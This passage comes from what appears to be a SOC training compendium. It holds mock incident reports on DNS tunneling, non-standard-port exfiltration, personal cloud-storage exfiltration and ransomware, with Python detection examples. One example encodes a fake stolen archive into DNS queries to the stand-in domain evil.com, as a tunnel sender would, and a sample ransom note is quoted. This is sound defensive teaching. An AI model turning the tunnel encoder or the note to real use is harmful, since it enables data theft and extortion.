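The detection logic above and the decoding step from the investigation, as an added example that is not ExtraHop's code: the tunnel traffic is constructed by encoding a made-up ZIP-like payload into first labels exactly as the sending side of a tunnel would, then scored on volume, TXT share, label entropy and non-repetition, and a ZIP magic check, and finally reassembled in time order. The payload, the hosts, the thresholds and the 30-byte chunk size are assumptions.

```python
"""DNS tunnel scoring and payload reassembly: many TXT queries to one domain,
high-entropy non-repeating first labels, and labels that decode to a ZIP header.
Added example, not ExtraHop's logic. The log is constructed by encoding a made-up
payload the way a tunnel sender would; thresholds are assumptions."""
import base64
import math
from collections import defaultdict
from datetime import datetime, timedelta

ZIP_MAGIC = b"PK\x03\x04"
CHUNK = 30  # 30 raw bytes -> 40 base64 chars, within the 63-byte DNS label limit

# Constructed "stolen archive": ZIP local-file header, a filename, then filler bytes.
PAYLOAD = (ZIP_MAGIC + b"\x14\x00\x00\x00\x08\x00" + b"Customer_List.csv" + bytes(range(256)) * 7)[:1800]
START = datetime(2024, 3, 12, 16, 15, 10)


def build_tunnel_queries(src, domain, payload, start, every=timedelta(seconds=5)):
    """Encode payload chunks as first labels (URL-safe base64, so '+' and '/' never appear)."""
    rows = []
    for i in range(0, len(payload), CHUNK):
        label = base64.urlsafe_b64encode(payload[i:i + CHUNK]).decode()
        rows.append({"ts": start + every * (i // CHUNK), "src": src, "qtype": "TXT",
                     "query": f"{label}.{domain}", "answer_len": 247})
    return rows


# Constructed dns.log-style rows: the tunnel plus ordinary lookups from another host.
DNS_LOG = build_tunnel_queries("192.168.45.78", "evil.com", PAYLOAD, START) + [
    {"ts": START + timedelta(seconds=7 * i), "src": "192.168.45.60", "qtype": "A", "query": q, "answer_len": 48}
    for i, q in enumerate(["www.company.com", "mail.company.com", "login.microsoftonline.com",
                           "sharepoint.company.com", "teams.microsoft.com", "www.company.com"])
]


def shannon_entropy(s):
    return -sum(p * math.log2(p) for p in (s.count(c) / len(s) for c in set(s))) if s else 0.0


def registered_domain(name):
    """Naive eTLD+1 (last two labels); use the public suffix list in production."""
    return ".".join(name.rstrip(".").split(".")[-2:])


def decode_label(label):
    try:
        return base64.urlsafe_b64decode(label + "=" * (-len(label) % 4))
    except ValueError:  # binascii.Error is a ValueError: not base64, treat as opaque
        return b""


def detect_dns_tunnel(log, min_queries=50, min_txt_ratio=0.5, min_entropy=3.5):
    """Per (source, registered domain) above min_queries: features and a 0-100 score."""
    groups = defaultdict(list)
    for r in log:
        groups[(r["src"], registered_domain(r["query"]))].append(r)
    results = {}
    for key, rows in groups.items():
        if len(rows) < min_queries:
            continue
        labels = [r["query"].split(".")[0] for r in rows]
        txt_ratio = sum(r["qtype"] == "TXT" for r in rows) / len(rows)
        entropy = sum(shannon_entropy(l) for l in labels) / len(labels)
        distinct = len(set(labels)) / len(labels)  # cached lookups repeat; tunnel chunks never do
        zip_magic = any(ZIP_MAGIC in decode_label(l) for l in labels)
        span_min = max(1.0, (max(r["ts"] for r in rows) - min(r["ts"] for r in rows)).total_seconds() / 60)
        score = 30  # volume alone
        score += 20 if txt_ratio >= min_txt_ratio else 0
        score += 30 if entropy >= min_entropy and distinct > 0.9 else 0
        score += 20 if zip_magic else 0
        results[key] = {"queries": len(rows), "per_minute": round(len(rows) / span_min, 1),
                        "txt_ratio": txt_ratio, "entropy": round(entropy, 2),
                        "zip_magic": zip_magic, "score": score}
    return results


def reassemble(log, src, domain):
    """Concatenate decoded first labels in time order: what the attacker's server received."""
    rows = sorted((r for r in log if r["src"] == src and registered_domain(r["query"]) == domain),
                  key=lambda r: r["ts"])
    return b"".join(decode_label(r["query"].split(".")[0]) for r in rows)


if __name__ == "__main__":
    for key, r in detect_dns_tunnel(DNS_LOG).items():
        print(key, r)
    print(reassemble(DNS_LOG, "192.168.45.78", "evil.com")[:32])
```

Two practical points follow from the encoding. Outbound bytes travel in the query name, so when sizing an exfiltration from DNS logs count name bytes for the upstream direction and answer bytes for the downstream (C2) direction; the two carry different things in a tunnel. And because DNS is case-insensitive and some resolvers randomise label case, base64 is fragile for a real tunnel, which is why tools such as dnscat2 encode as hex; a hex-encoded label scores lower on entropy (16 symbols instead of 64), so the entropy threshold should be set per alphabet rather than as one number.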
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|------|--------|------------|----------|
| 1. Alert Validation | Verify ExtraHop alert | ExtraHop Console | Confirmed DNS tunneling activity |
| 2. Process Investigation | Identify process on endpoint | CrowdStrike Falcon | dnscat2.exe (DNS tunneling tool) running |
| 3. Data Analysis | Decode DNS queries | Base64 decoder | Exfiltrated data: ZIP files with documents |
| 4. Immediate Action | Isolate host | CrowdStrike | ENG-WS-045 quarantined |
| 5. DNS Blocking | Block evil.com domain | Cisco Umbrella, Palo Alto | Domain blocked |
| 6. Malware Removal | Clean infected host | CrowdStrike Live Response | dnscat2.exe removed; host reimaged |
Jira Incident Report
Ticket: SOC-2024-209
Summary: T1071.004 – DNS Tunneling C2/Exfiltration via dnscat2
Status: RESOLVED
Resolution: MALICIOUS – C2 Disrupted, Data Exfiltrated (210 KB)
Priority: P2 – MEDIUM
Labels: T1071, dns-tunneling, c2, exfiltration, extrahop, dnscat2
Components: Network-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: ExtraHop Reveal(x).
Alert: “DNS Tunneling Detected – Potential C2 or Exfiltration”.
Source: ENG-WS-045 (Engineering, user rpatel).
Method: DNS tunneling via TXT queries to evil.com.
Data: ~210 KB exfiltrated or C2 traffic.
Time: 2024-03-12 16:30 EST.
Technique: MITRE ATT&CK T1071.004 – Application Layer Protocol: DNS.
2. Technical Analysis:
Attack Chain:
15:30 – rpatel account compromised via phishing
15:45 – Attacker logs into ENG-WS-045
15:50 – Attacker downloads dnscat2.exe (DNS tunneling tool)
15:55 – Attacker collects sensitive files (ZIP archives)
16:00-16:30 – Exfiltration via DNS tunneling
16:30 – ExtraHop detects
DNS Tunneling Tool:
Name: dnscat2.exe
SHA256: a1b2c3d4…
Mechanism: Encodes data in DNS queries (subdomains)
Protocol: DNS over UDP port 53
Server: evil.com (attacker-controlled DNS server)
Exfiltrated Data (210 KB):
Financial reports (2 files) – 95 KB
Customer list (1 file) – 58 KB
Source code snippets (3 files) – 57 KB
Total: 6 files, 210 KB
DNS Query Analysis:
Total Queries: 847 in 15 minutes
Data per Query: ~250 bytes
Total Data: ~210 KB
Domain: evil.com (now blocked)
3. Investigation Findings:
Timeline:
15:30 – Account compromised
15:45 – Attacker logs in
15:50 – dnscat2.exe downloaded
15:55 – Data collection
16:00-16:30 – Exfiltration
16:30 – ExtraHop alert
16:32 – SOC investigates
16:33 – Host isolated
16:34 – Domain blocked
Indicators of Compromise (IoCs):
Network:
– Domain: evil.com (blocked)
– DNS pattern: 847 TXT queries in 15 minutes
File:
– C:\Windows\Temp\dnscat2.exe (SHA256: a1b2c3d4…)
Account:
– rpatel (compromised)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045.
Blocked evil.com domain at firewall and DNS.
Terminated dnscat2.exe process.
Deleted dnscat2.exe.
Disabled rpatel account.
Reset password.
Data Protection:
Determined scope of exfiltrated data (210 KB, 6 files).
Notified affected data owners.
Host Remediation:
Reimaged host.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to data theft.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
DNS allowed to external resolvers (8.8.8.8).
6. Business Impact:
Operational Impact: Engineering host offline for 2 hours.
Data Exposure: 210 KB of sensitive data exfiltrated (financial, customer, source code).
7. Remediation & Prevention:
Completed Actions:
Exfiltration stopped.
Malware removed.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Restricted DNS to corporate resolvers only.
Enhanced monitoring for DNS tunneling.
8. Conclusion:
An attacker used DNS tunneling to exfiltrate 210 KB of sensitive data, evading detection by using a non-standard protocol. ExtraHop detected the anomalous DNS query pattern and enabled rapid containment, though exfiltration had already occurred.
Closure Rationale: Data exfiltrated; exfiltration stopped; account secured.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-12 17:30 EST
170. T1048.003 – Exfiltration Over Unencrypted/Non-Standard Protocol (Palo Alto Detection)
Palo Alto Alert Details
Alert ID: PAN-EXFIL-ALT-PROTO-1048-7842
Alert Time: 2024-03-12 10:30:22 EST
Severity: HIGH (85/100)
Source: Palo Alto Networks Firewall + WildFire
Rule: “Data Exfiltration over Non-Standard Port Detected”
MITRE ATT&CK: T1048.003 – Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
Alert Details:
Detection: Large data transfer over TCP port 444 (not standard) to suspicious IP
User: bturner@company.com (Brian Turner, Accountant)
Source: 192.168.45.112 (FIN-WS-078)
Destination: 185.143.221[.]89:444
Time: 10:15-10:30 EST
Protocol: Raw TCP (no application layer)
Traffic Analysis:
10:15-10:30: 4 separate TCP streams
Total data: 47 MB
Data pattern: Raw binary (not HTTP, FTP, etc.)
Payload analysis (WildFire): Contains ZIP archives of financial documents
Detection Logic:
Large data transfer on non-standard port (444)
Destination IP known malicious
No standard protocol (raw TCP) – suspicious
Pattern matches exfiltration over alternative protocol
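The four detection points above, applied as an added example (not Palo Alto's rule) to firewall traffic-log rows: outbound sessions are aggregated per source, destination, port and application, and each flow is scored for an unrecognised application layer, a non-standard port, volume, and a threat-intel hit. The rows are constructed in PAN-OS traffic-log terms (App-ID reports raw TCP as "unknown-tcp"); the internal ranges, the sanctioned-app list, the KNOWN_BAD entry and the 10 MiB threshold are assumptions.

```python
"""Outbound-volume triage over firewall traffic logs for T1048.003: no recognised
application layer, non-standard destination port, large byte count, and a
threat-intel hit on the destination. Added example, not Palo Alto's rule.
Rows are constructed; nets, lists and thresholds are assumptions."""
import ipaddress
from collections import defaultdict

INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
STANDARD_PORTS = {22, 25, 53, 80, 123, 443, 587, 993}
SANCTIONED_APPS = {"ms-onedrive", "sharepoint-online", "ms-teams"}  # corporate SaaS: high volume is expected
KNOWN_BAD = {"185.143.221.89"}  # assumed threat-intel feed entry
VOLUME_THRESHOLD = 10 * 1024 * 1024  # 10 MiB sent to one destination in the window

# Constructed traffic-log rows (one per session; bytes_sent = client to server).
TRAFFIC_LOG = [
    {"ts": "2024-03-12T10:15:01", "src": "192.168.45.112", "dst": "185.143.221.89", "dport": 444, "app": "unknown-tcp", "bytes_sent": 12_300_000},
    {"ts": "2024-03-12T10:19:10", "src": "192.168.45.112", "dst": "185.143.221.89", "dport": 444, "app": "unknown-tcp", "bytes_sent": 11_800_000},
    {"ts": "2024-03-12T10:23:05", "src": "192.168.45.112", "dst": "185.143.221.89", "dport": 444, "app": "unknown-tcp", "bytes_sent": 12_100_000},
    {"ts": "2024-03-12T10:27:40", "src": "192.168.45.112", "dst": "185.143.221.89", "dport": 444, "app": "unknown-tcp", "bytes_sent": 10_800_000},
    # Large but sanctioned: OneDrive sync from another finance workstation.
    {"ts": "2024-03-12T10:16:00", "src": "192.168.45.60", "dst": "13.107.136.10", "dport": 443, "app": "ms-onedrive", "bytes_sent": 60_000_000},
    # Unknown protocol on an odd port, but tiny: a monitoring-agent heartbeat.
    {"ts": "2024-03-12T10:17:00", "src": "192.168.45.60", "dst": "93.184.216.34", "dport": 8443, "app": "unknown-tcp", "bytes_sent": 20_480},
    # Internal SMB copy: not egress, ignored.
    {"ts": "2024-03-12T10:18:00", "src": "192.168.45.112", "dst": "192.168.10.50", "dport": 445, "app": "ms-ds-smb", "bytes_sent": 200_000_000},
]


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def detect_egress_exfil(log, threshold=VOLUME_THRESHOLD, min_score=70):
    """Aggregate bytes sent per (src, dst, dport, app) and score each internet-bound flow."""
    agg = defaultdict(lambda: {"bytes_sent": 0, "sessions": 0})
    for r in log:
        if not is_internal(r["src"]) or is_internal(r["dst"]):
            continue  # only internal -> internet
        a = agg[(r["src"], r["dst"], r["dport"], r["app"])]
        a["bytes_sent"] += r["bytes_sent"]
        a["sessions"] += 1
    alerts = {}
    for (src, dst, dport, app), a in agg.items():
        if app in SANCTIONED_APPS:
            continue
        score, reasons = 0, []
        if app.startswith("unknown-"):
            score += 30
            reasons.append(f"no recognised application layer ({app})")
        if dport not in STANDARD_PORTS:
            score += 20
            reasons.append(f"non-standard destination port {dport}")
        if a["bytes_sent"] >= threshold:
            score += 30
            reasons.append(f"{a['bytes_sent'] / 1e6:.1f} MB sent over {a['sessions']} session(s)")
        if dst in KNOWN_BAD:
            score += 20
            reasons.append("destination on threat-intel list")
        if score >= min_score:
            alerts[(src, dst, dport)] = {"score": score, "bytes_sent": a["bytes_sent"],
                                         "sessions": a["sessions"], "reasons": reasons}
    return alerts


if __name__ == "__main__":
    for key, a in detect_egress_exfil(TRAFFIC_LOG).items():
        print(key, a["score"], "; ".join(a["reasons"]))
```

The per-session view is what hides this kind of transfer: four sessions of 10-12 MB each sit under many per-session thresholds, and only the aggregate across the window reaches 47 MB. Note also that an attacker who wraps the same transfer in TLS on port 444 shows up as App-ID "ssl" rather than "unknown-tcp", so a production rule should treat "ssl" on a non-443 port as a comparable signal rather than rely on the raw-TCP case alone.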
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|------|--------|------------|----------|
| 1. Alert Validation | Verify Palo Alto alert | Panorama Logs | Confirmed exfiltration over TCP/444 |
| 2. Process Investigation | Identify process on endpoint | CrowdStrike Falcon | Custom exfiltration tool (exfil.exe) |
| 3. Data Analysis | Determine what was stolen | DLP, File Audit | 47 MB of financial data exfiltrated |
| 4. Immediate Action | Isolate host | CrowdStrike | FIN-WS-078 quarantined |
| 5. C2 Blocking | Block destination IP | Palo Alto | 185.143.221[.]89 blocked |
| 6. Incident Response | Activate breach response | Legal, Management | Data breach declared |
Jira Incident Report
Ticket: SOC-2024-210
Summary: T1048.003 – 47 MB Financial Data Exfiltrated over TCP/444
Status: RESOLVED
Resolution: MALICIOUS – Data Breach Confirmed
Priority: P1 – CRITICAL
Labels: T1048, exfiltration, alternative-protocol, palo-alto, data-breach
Components: Network-Security, Data-Protection
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Palo Alto Networks Firewall + WildFire.
Alert: “Data Exfiltration over Non-Standard Port Detected”.
User: bturner@company.com (Finance Department).
Host: FIN-WS-078.
Destination: 185.143.221[.]89:444.
Data: 47 MB exfiltrated.
Time: 2024-03-12 10:30 EST.
Technique: MITRE ATT&CK T1048.003 – Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol.
2. Technical Analysis:
Attack Chain:
09:30 – bturner account compromised via phishing
09:45 – Attacker logs into FIN-WS-078 via RDP
09:50 – Attacker collects financial documents
10:00 – Attacker runs exfil.exe (custom tool)
10:15-10:30 – Data exfiltration over TCP/444
10:30 – Palo Alto detects
Exfiltration Method:
Protocol: Raw TCP (no HTTP, FTP, etc.)
Port: 444 (non-standard, not commonly monitored)
Tool: exfil.exe (SHA256: a1b2c3d4…)
Data: 47 MB in 4 streams
Exfiltrated Data:
Q1 financial reports (12 MB)
Q2 forecasts (8 MB)
Budget spreadsheets (15 MB)
Customer payment data (10 MB)
Merger documents (2 MB)
Total: 47 MB
Attacker Infrastructure:
IP: 185.143.221[.]89
Port: 444
Location: Bulgaria
3. Investigation Findings:
Timeline:
09:30 – Account compromised
09:45 – Attacker logs in
09:50-10:00 – Data collection
10:15-10:30 – Exfiltration
10:30 – Alert
10:32 – SOC investigates
10:33 – Host isolated
10:34 – C2 blocked
Indicators of Compromise (IoCs):
Network:
– Destination: 185.143.221[.]89:444
– Protocol: Raw TCP
Files:
– C:\Windows\Temp\exfil.exe (SHA256: a1b2c3d4…)
– C:\temp\data.zip (47 MB, exfiltrated)
Account:
– bturner (compromised)
4. Containment Actions:
Immediate Actions:
Isolated FIN-WS-078.
Blocked destination IP at firewall.
Terminated exfil.exe process.
Deleted exfil.exe.
Disabled bturner account.
Reset password.
Breach Response:
Declared data breach.
Notified legal, PR, management.
Began customer notification process.
Reported to relevant authorities.
Host Remediation:
Reimaged host.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to data theft.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
Outbound traffic allowed on non-standard ports.
6. Business Impact:
Operational Impact: Finance host offline.
Data Exposure: 47 MB of financial and customer data exfiltrated.
Regulatory Impact: GDPR/CCPA breach.
Financial Impact: Significant.
7. Remediation & Prevention:
Completed Actions:
Exfiltration stopped.
Host isolated.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Blocked non-standard outbound ports.
Enhanced DLP for egress traffic.
8. Conclusion:
An attacker compromised a finance user’s account and exfiltrated 47 MB of financial data over a non-standard port (TCP/444). Palo Alto detected the anomalous traffic, but exfiltration had already occurred. A full data breach response was initiated.
Closure Rationale: Data exfiltrated; exfiltration stopped; breach response initiated.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-12 11:30 EST
Batch 35: Impact & Collection Incident Reports
171. T1567.002 – Exfiltration to Cloud Storage (Zscaler Detection)
Zscaler Alert Details
Alert ID: ZSCALER-CLOUD-EXFIL-1567-7842
Alert Time: 2024-03-13 09:30:15 EST
Severity: CRITICAL (95/100)
Source: Zscaler Internet Access (ZIA) – Cloud App Control
Rule: “Sensitive Data Upload to Personal Cloud Storage”
MITRE ATT&CK: T1567.002 – Exfiltration Over Web Service: Exfiltration to Cloud Storage
Alert Details:
Detection: Large upload of sensitive files to personal Google Drive account
User: kwilson@company.com (Karen Wilson, Finance Manager)
Source IP: 192.168.45.112 (FIN-WS-078)
Destination: https://www.googleapis.com/upload/drive/v3/files
Time: 09:15-09:30 EST
Upload Details:
09:15:22 – Authentication to Google Drive (OAuth) – personal account “finance.manager.kw@gmail.com”
09:16:45 – Upload: “Q1_Financial_Results.xlsx” (8.2 MB)
09:18:12 – Upload: “Q2_Projections.xlsx” (7.5 MB)
09:19:33 – Upload: “Customer_Payment_History.csv” (12.3 MB)
09:21:05 – Upload: “Merger_Agreement_Draft.pdf” (4.2 MB)
09:22:28 – Upload: “Executive_Bonus_Plan.xlsx” (3.1 MB)
09:23:50 – Upload: “VPN_Configs.zip” (2.8 MB)
09:25:15 – Upload: “passwords.kdbx” (1.8 MB)
Total: 7 files, 39.9 MB
Detection Logic:
Multiple sensitive files uploaded to personal Google Drive
User kwilson has corporate OneDrive, no business need for personal Google Drive
Files contain financial data, PII, confidential documents
Destination is personal account (not corporate)
Pattern matches data exfiltration to cloud storage
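The rule logic above expressed as code, added here as an example that is not part of the original report and not Zscaler's product logic. It runs over a constructed, pipe-delimited proxy log that is a simplified stand-in for a ZIA web-log export (not the real schema). The cloud-upload host list, the corporate-domain set and the sensitive-filename pattern are assumptions; the sample lines mirror the seven uploads in the alert plus two benign uploads (a corporate OneDrive upload and a single small personal upload) that must not fire.

```python
"""Detect bulk uploads of sensitive files to personal cloud storage (T1567.002).

Added example for this report, not Zscaler's detection engine. The log format
is a constructed stand-in; field names and sample lines are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample. Fields: time|user|src_ip|host|path|bytes_out|filename|cloud_account
SAMPLE_LOG = """\
2024-03-13 09:16:45|kwilson@company.com|192.168.45.112|www.googleapis.com|/upload/drive/v3/files|8598323|Q1_Financial_Results.xlsx|finance.manager.kw@gmail.com
2024-03-13 09:18:12|kwilson@company.com|192.168.45.112|www.googleapis.com|/upload/drive/v3/files|7864320|Q2_Projections.xlsx|finance.manager.kw@gmail.com
2024-03-13 09:19:33|kwilson@company.com|192.168.45.112|www.googleapis.com|/upload/drive/v3/files|12897485|Customer_Payment_History.csv|finance.manager.kw@gmail.com
2024-03-13 09:21:05|kwilson@company.com|192.168.45.112|www.googleapis.com|/upload/drive/v3/files|4404019|Merger_Agreement_Draft.pdf|finance.manager.kw@gmail.com
2024-03-13 09:22:28|kwilson@company.com|192.168.45.112|www.googleapis.com|/upload/drive/v3/files|3250586|Executive_Bonus_Plan.xlsx|finance.manager.kw@gmail.com
2024-03-13 09:23:50|kwilson@company.com|192.168.45.112|www.googleapis.com|/upload/drive/v3/files|2936013|VPN_Configs.zip|finance.manager.kw@gmail.com
2024-03-13 09:25:15|kwilson@company.com|192.168.45.112|www.googleapis.com|/upload/drive/v3/files|1887437|passwords.kdbx|finance.manager.kw@gmail.com
2024-03-13 09:26:00|jdoe@company.com|192.168.45.50|company-my.sharepoint.com|/personal/jdoe/_api/web|5242880|notes.docx|jdoe@company.com
2024-03-13 09:27:10|mlee@company.com|192.168.45.61|www.googleapis.com|/upload/drive/v3/files|204800|holiday.jpg|mlee.personal@gmail.com
"""

# Upload endpoints of consumer cloud-storage apps (assumed starter list).
CLOUD_UPLOAD_HOSTS = {
    "www.googleapis.com": "Google Drive",
    "content.dropboxapi.com": "Dropbox",
    "upload.box.com": "Box",
}
CORPORATE_DOMAINS = {"company.com"}          # tenants that count as "corporate"
SENSITIVE_NAME = re.compile(
    r"password|\.kdbx$|vpn|financial|payment|merger|bonus|salary|customer", re.I
)


def parse_log(text):
    """Parse the pipe-delimited sample into event dicts."""
    events = []
    for line in text.strip().splitlines():
        ts, user, src_ip, host, path, nbytes, fname, account = line.split("|")
        events.append({
            "time": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
            "user": user, "src_ip": src_ip, "host": host, "path": path,
            "bytes": int(nbytes), "filename": fname, "account": account,
        })
    return events


def is_personal_account(account):
    """A cloud account is personal when its domain is not a corporate tenant."""
    return account.rsplit("@", 1)[-1].lower() not in CORPORATE_DOMAINS


def detect_cloud_exfil(events, window=timedelta(minutes=15),
                       min_files=3, min_bytes=20 * 1024 * 1024):
    """Flag users who push many files, many bytes, or any sensitive-looking
    file to a personal cloud-storage account within one sliding window."""
    per_user = defaultdict(list)
    for ev in events:
        if ev["host"] in CLOUD_UPLOAD_HOSTS and is_personal_account(ev["account"]):
            per_user[ev["user"]].append(ev)

    findings = []
    for user, evs in per_user.items():
        evs.sort(key=lambda e: e["time"])
        start, best = 0, None
        for j, ev in enumerate(evs):
            # Advance the window start so it covers only `window` of history.
            while evs[start]["time"] < ev["time"] - window:
                start += 1
            chunk = evs[start:j + 1]
            total = sum(c["bytes"] for c in chunk)
            sensitive = [c["filename"] for c in chunk if SENSITIVE_NAME.search(c["filename"])]
            if len(chunk) >= min_files or total >= min_bytes or sensitive:
                if best is None or len(chunk) > best["files"]:
                    best = {
                        "user": user,
                        "app": CLOUD_UPLOAD_HOSTS[ev["host"]],
                        "account": ev["account"],
                        "files": len(chunk),
                        "bytes_mb": round(total / (1024 * 1024), 1),
                        "sensitive": sensitive,
                        "first": chunk[0]["time"].strftime("%H:%M:%S"),
                        "last": ev["time"].strftime("%H:%M:%S"),
                        "severity": "critical" if sensitive or total >= min_bytes else "high",
                    }
        if best:
            findings.append(best)
    return findings


if __name__ == "__main__":
    for finding in detect_cloud_exfil(parse_log(SAMPLE_LOG)):
        print(finding)
```

The three thresholds are deliberately OR-ed: the filename check alone would have caught `passwords.kdbx` on its own, before the byte count crossed the limit, which is the difference between alerting at 09:25 and alerting at 09:30.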
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Zscaler alert | Zscaler Admin Console | Confirmed upload to personal Google Drive |
| 2. User Interview | Contact kwilson | Teams, Phone | User did NOT upload files (account compromised) |
| 3. Google Drive Investigation | Check file access | Google Workspace Admin | Files uploaded to attacker’s personal account (finance.manager.kw@gmail.com) |
| 4. Immediate Action | Isolate host | CrowdStrike | FIN-WS-078 quarantined |
| 5. Account Remediation | Disable kwilson account | Azure AD, AD | Account disabled; password reset |
| 6. Legal Action | Contact Google for takedown | Legal Team | DMCA takedown request submitted |
Jira Incident Report
**Ticket:** SOC-2024-211
**Summary:** T1567.002 – 39.9 MB of Sensitive Data Exfiltrated to Personal Google Drive
**Status:** RESOLVED
**Resolution:** MALICIOUS – Data Breach Confirmed
**Priority:** P1 – CRITICAL
**Labels:** T1567, cloud-exfiltration, google-drive, zscaler, data-breach
**Components:** Data-Security, Incident-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Zscaler Internet Access (Cloud App Control).
Alert: “Sensitive Data Upload to Personal Cloud Storage”.
User: kwilson@company.com (Finance Manager).
Destination: Personal Google Drive (finance.manager.kw@gmail.com).
Data: 39.9 MB (7 files) uploaded.
Time: 2024-03-13 09:30 EST.
Technique: MITRE ATT&CK T1567.002 – Exfiltration Over Web Service: Exfiltration to Cloud Storage.
2. Technical Analysis:
Attack Chain:
08:30 – kwilson account compromised via phishing
08:45 – Attacker logs into FIN-WS-078 via RDP
08:50 – Attacker collects sensitive files from local and network shares
09:00 – Attacker accesses personal Google Drive via Chrome
09:15-09:30 – Upload of 7 files (39.9 MB)
09:30 – Zscaler detects
Files Exfiltrated:
Q1_Financial_Results.xlsx (8.2 MB) – detailed revenue, expenses
Q2_Projections.xlsx (7.5 MB) – forecast, budget
Customer_Payment_History.csv (12.3 MB) – customer names, payment details (PII)
Merger_Agreement_Draft.pdf (4.2 MB) – confidential acquisition details
Executive_Bonus_Plan.xlsx (3.1 MB) – sensitive HR data
VPN_Configs.zip (2.8 MB) – network access details
passwords.kdbx (1.8 MB) – corporate password vault
Google Drive Account:
Email: finance.manager.kw@gmail.com
IP: 185.143.221[.]89 (attacker)
Status: Files uploaded and accessible
User Status:
Account compromised; user unaware
3. Investigation Findings:
Timeline:
08:30 – Account compromised
08:45 – Attacker logs in
08:50-09:00 – Data collection
09:15-09:30 – Upload to Google Drive
09:30 – Zscaler alert
09:32 – SOC investigates
09:33 – Host isolated
09:34 – Account disabled
Indicators of Compromise (IoCs):
Network:
– Destination: Google Drive API
– Attacker IP: 185.143.221[.]89
Files:
– 7 files, 39.9 MB exfiltrated (list attached)
Account:
– kwilson (compromised)
– finance.manager.kw@gmail.com (receiving account)
4. Containment Actions:
Immediate Actions:
Isolated FIN-WS-078 via CrowdStrike.
Blocked Google Drive uploads for compromised account.
Disabled kwilson account.
Reset password.
Breach Response:
Declared data breach.
Notified legal, PR, management.
Began customer notification process (PII exposure).
Submitted DMCA takedown request to Google (caveat: DMCA covers copyrighted works only; for exfiltrated PII and credentials the applicable routes are Google’s abuse/legal-request process and a law-enforcement request).
Rotated all corporate passwords (password vault compromised).
Host Remediation:
Reimaged host.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to data theft.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
Cloud storage allowed (not restricted).
6. Business Impact:
Operational Impact: Finance host offline; password reset for all users.
Data Exposure: 39.9 MB of financial data, PII, strategic documents, passwords exfiltrated.
Regulatory Impact: GDPR/CCPA breach (customer PII).
Financial Impact: Significant (IP theft, incident response, notification, potential fines).
7. Remediation & Prevention:
Completed Actions:
Exfiltration stopped.
Host isolated.
Account secured.
Takedown request submitted.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Restricted cloud storage to corporate accounts only.
Enhanced DLP for cloud uploads.
8. Conclusion:
An attacker compromised a finance manager’s account and exfiltrated 39.9 MB of sensitive data to a personal Google Drive account. Zscaler detected the large uploads, but exfiltration had already occurred. A full data breach response was initiated, and all corporate passwords were rotated.
Closure Rationale: Data exfiltrated; exfiltration stopped; breach response initiated; all passwords rotated.
Analyst: [Your Name], SOC Analyst Date: 2024-03-13 10:30 EST
172. T1486 – Data Encrypted for Impact (CrowdStrike Detection)
CrowdStrike Alert Details
* **Alert ID:** CS-RANSOMWARE-1486-7842
* **Alert Time:** 2024-03-13 14:15:33 EST
* **Severity:** CRITICAL (99/100)
* **Source:** CrowdStrike Falcon EDR
* **Rule:** “Ransomware Behavior Detected – Mass File Encryption”
* **MITRE ATT&CK:** T1486 – Data Encrypted for Impact
Alert Details:
Detection: Process encrypting multiple files and appending .encrypted extension
* **Host:** FILESRV-02 (File Server)
* **User:** SYSTEM (via compromised admin account)
* **Process:** C:\Windows\Temp\encryptor.exe (PID: 4789)
* **SHA256:** a1b2c3d4… (hash truncated in this record)
* **Time:** 14:10-14:15 EST
File Encryption Events:
14:10-14:15: 12,847 files encrypted
File extensions changed to .encrypted
Locations affected:
`\\filesrv\finance\*.*` – 3,456 files (23 GB)
`\\filesrv\hr\*.*` – 2,891 files (15 GB)
`\\filesrv\r&d\*.*` – 4,234 files (28 GB)
`\\filesrv\executive\*.*` – 1,234 files (8 GB)
`\\filesrv\backups\*.*` – 1,032 files (4 GB)
Ransom Note:
File: README_ENCRYPTED.txt (created in each folder)
Content:

```text
YOUR FILES ARE ENCRYPTED!
All your documents, databases and other important files have been encrypted with RSA-2048.
To recover your files, send 2 BTC to: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa
Then contact: decrypt@onionmail.org with your server ID: FILESRV-02
You have 72 hours. Do not attempt to recover files yourself, you will lose them.
```
Detection Logic:
Mass file encryption (12,847 files in 5 minutes)
File extension changes (.encrypted)
Ransom note dropped
Process from Temp folder
Pattern matches ransomware attack
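The detection logic above as a runnable check, added here as an example and not CrowdStrike's implementation. It runs a per-process sliding window over a constructed file-activity stream: an encryptor renaming files across four shares and dropping notes, a backup job creating hundreds of `.bak` files, and a sync client finalising two temp files. The event shape, thresholds and sample processes are assumptions; the point is that the signature is one new extension applied by one process to many files across several directories, which the backup job (creates, not renames) and the sync client (two renames) do not match.

```python
"""Detect mass file encryption behaviour (T1486) from file-activity events.

Added example for this report, not CrowdStrike's detection logic. The event
shape and the sample events are constructed for illustration.
"""
import ntpath
from collections import Counter, defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Optional


@dataclass
class FileEvent:
    time: datetime
    pid: int
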